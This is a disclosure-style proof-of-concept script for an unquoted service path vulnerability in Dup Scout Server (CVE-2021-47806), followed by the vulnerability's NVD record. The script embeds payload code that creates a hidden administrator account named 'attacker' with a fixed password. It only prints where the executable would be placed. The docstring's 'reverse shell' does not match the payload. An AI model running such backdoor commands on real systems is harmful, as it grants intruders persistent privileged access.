CVE-2021-47806

# CVE-2021-47806 PoC - Dup Scout Server Unquoted Service Path # Author: VulnCheck Disclosure # This PoC demonstrates the unquoted service path vulnerability in Dup Scout Server import os import subprocess import sys def check_vulnerability(): """Check if Dup Scout Server is installed and vulnerable""" service_path = r'C:\Program Files\Dup Scout Server\bin\dupscts.exe' # Check if service executable exists if not os.path.exists(service_path): print("[-] Dup Scout Server does not appear to be installed") return False # Check if vulnerable path exists (without quotes) vulnerable_paths = [ r'C:\Program.exe', r'C:\Program Files\Dup Scout.exe', r'C:\Program Files\Dup Scout Server\bin\dupscts.exe' ] print("[+] Checking for exploitable paths...") for path in vulnerable_paths[:-1]: if not os.path.exists(path): print(f"[*] Path does not exist: {path}") print(f"[*] This path could be exploited if writable") return True def create_malicious_executable(): """Create a reverse shell payload as 'Dup Scout.exe'""" malicious_path = r'C:\Program Files\Dup Scout.exe' # Create a simple executable that creates a backdoor # In real attack, this would be a proper meterpreter/reverse shell payload_code = ''' import os import subprocess # Create admin user for persistence try: subprocess.run(['net', 'user', 'attacker', 'P@ssw0rd123', '/add'], capture_output=True) subprocess.run(['net', 'localgroup', 'Administrators', 'attacker', '/add'], capture_output=True) print("Backdoor user created successfully") except Exception as e: print(f"Error: {e}") ''' print(f"[*] Malicious executable would be placed at: {malicious_path}") print("[*] When Dup Scout service restarts, this file will be executed with SYSTEM privileges") def main(): print("=" * 60) print("CVE-2021-47806 - Dup Scout Server Unquoted Service Path Exploit") print("=" * 60) if os.name != 'nt': print("[-] This exploit only works on Windows systems") return if check_vulnerability(): print("[+] Dup Scout Server appears to be installed") create_malicious_executable() print("\n[!] Note: Actual exploitation requires write access to Program Files directory") print("[!] Default Windows permissions on Program Files prevent this attack") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47806", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:25.313", "lastModified": "2026-01-30T00:54:47.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dup Scout 13.5.28 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\Dup Scout Server\\bin\\dupscts.exe' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "Dup Scout 13.5.28 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio de Windows que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden exploit la ruta sin comillas en 'C:\\Program Files\\Dup Scout Server\\bin\\dupscts.exe' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flexense:dup_scout:13.5.28:*:*:*:*:*:*:*", "matchCriteriaId": "05E7AE1C-54E6-4F0C-813E-EE340AA6FFD5"}]}]}], "references": [{"url": "https://www.dupscout.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50025", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/dup-scout-multiple-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50025", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}